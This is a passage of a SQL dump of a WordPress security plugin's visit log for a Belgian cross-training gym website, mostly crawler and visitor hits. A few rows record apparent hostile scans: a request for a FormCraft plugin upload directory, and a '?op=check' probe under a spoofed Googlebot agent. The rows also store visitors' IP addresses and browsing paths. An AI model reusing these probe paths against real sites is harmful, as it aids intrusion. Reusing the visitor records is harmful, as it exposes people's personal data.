(70685, 1493096602.174141, 1837858581, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70686, 1493096602.658555, 1837858581, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70687, 1493096603.153826, 1837858581, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70688, 1493096603.613289, 1837858581, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70689, 1493096751.639083, 520974917, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)'),
(70690, 1493097307.610938, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70691, 1493101827.984073, 3652617287, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(70692, 1493101864.929690, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(70693, 1493105299.180373, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70694, 1493115850.340156, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70695, 1493116168.640029, 1338305741, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70696, 1493123985.946673, 2783008832, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'https://www.google.nl', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(70697, 1493123987.131363, 2783008832, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(70698, 1493123987.708348, 2783008832, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/prix/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(70699, 1493124011.063711, 2783008832, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(70700, 1493124014.708333, 2783008832, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(70701, 1493126766.221927, 2661914122, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(70702, 1493126767.231793, 2661914122, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(70703, 1493129219.063171, 3342489294, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(70704, 1493129222.999332, 3342489294, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(70705, 1493129225.945737, 3342489294, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(70706, 1493129279.320177, 3342489294, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(70707, 1493135374.280327, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(70708, 1493135374.901977, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70709, 1493135375.360064, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70710, 1493135375.812079, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70711, 1493135376.330248, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70712, 1493135376.917418, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70713, 1493135377.458993, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70714, 1493135377.928799, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(70715, 1493135378.372262, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70716, 1493135378.798098, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70717, 1493135379.239672, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70718, 1493135379.750746, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70719, 1493135380.203631, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70720, 1493135380.640255, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70721, 1493135422.827554, 1338305741, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70722, 1493140265.281945, 2509960529, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(70723, 1493140800.463065, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(70724, 1493141126.362897, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(70725, 1493144758.342103, 1338305741, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70726, 1493145111.737216, 3585419230, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70727, 1493145123.548743, 3585419230, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70728, 1493145736.137780, 3585419230, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70729, 1493146479.552924, 676177849, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70730, 1493146479.785397, 676177849, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70731, 1493146553.678585, 3475901839, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70732, 1493149163.099150, 1837165719, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70733, 1493149163.744443, 1837165719, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70734, 1493149164.234254, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70735, 1493149164.755584, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70736, 1493149165.229354, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70737, 1493149165.729893, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70738, 1493149166.373967, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70739, 1493149166.837494, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70740, 1493149167.334898, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70741, 1493149167.917612, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70742, 1493149168.514470, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70743, 1493149853.287325, 2366158596, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70744, 1493149853.409537, 2996485408, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70745, 1493149859.503072, 2366148270, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70746, 1493153712.647683, 2637637525, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70747, 1493155869.301640, 1538628250, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/wpcf7_captcha/689312643.png', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70748, 1493155869.888556, 1538628250, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/uploads/wpcf7_captcha/689312643.png', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70749, 1493158467.094497, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(70750, 1493158469.183057, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70751, 1493158470.466009, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70752, 1493158554.188377, 1338305741, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70753, 1493158778.021875, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70754, 1493158778.640540, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70755, 1493158779.180557, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70756, 1493158779.695883, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70757, 1493159058.792986, 1123632438, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70758, 1493159059.375324, 1123632438, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70759, 1493161085.755914, 1338305741, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70760, 1493164355.073397, 1338305741, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70761, 1493169293.977729, 1338305741, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70762, 1493171709.053295, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/formcraft/file-upload/server/content/', 'http://www.crosstrainingcenter.be/wp-content/plugins/formcraft/file-upload/server/content/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(70763, 1493174168.017668, 3024883476, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(70764, 1493174168.462937, 3024883608, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(70765, 1493174208.991394, 3024883466, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(70766, 1493175527.403837, 1123632584, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70767, 1493175528.461828, 1123632437, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70768, 1493177048.732107, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70769, 1493177918.356886, 1338305741, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70770, 1493179731.129881, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70771, 1493180103.600467, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70772, 1493180465.941572, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70773, 1493180877.451321, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70774, 1493181309.362870, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70775, 1493181687.369757, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70776, 1493182063.354640, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70777, 1493182468.636030, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/266-2/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70778, 1493182819.240701, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70779, 1493183125.962859, 1123632437, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70780, 1493183186.413904, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70781, 1493183511.990516, 1123632437, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70782, 1493183888.933650, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70783, 1493183888.935563, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70784, 1493184242.613730, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70785, 1493184582.023551, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70786, 1493184937.481903, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70787, 1493184941.632204, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70788, 1493187658.863615, 676177832, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70789, 1493188563.791587, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70790, 1493189789.162087, 676177832, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70791, 1493190022.029590, 2956707729, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/?op=check', 'http://www.crosstrainingcenter.be/?op=check', 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)'),
(70792, 1493190985.679127, 2637637525, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70793, 1493191002.972914, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(70794, 1493193327.421324, 772029058, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(70795, 1493193332.478952, 772029058, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/feed/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(70796, 1493199919.798723, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70797, 1493207774.091967, 1123632437, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70798, 1493208554.856970, 3242976508, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjX7s-qi8LTAhWIuRoKHaXMD_UQFggjMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(70799, 1493211639.460979, 1837165719, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70800, 1493211640.253896, 1837165719, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70801, 1493211641.278492, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70802, 1493211641.936125, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70803, 1493211643.142315, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70804, 1493211643.799370, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70805, 1493211644.696572, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70806, 1493211645.446628, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70807, 1493211646.032227, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70808, 1493211646.804614, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
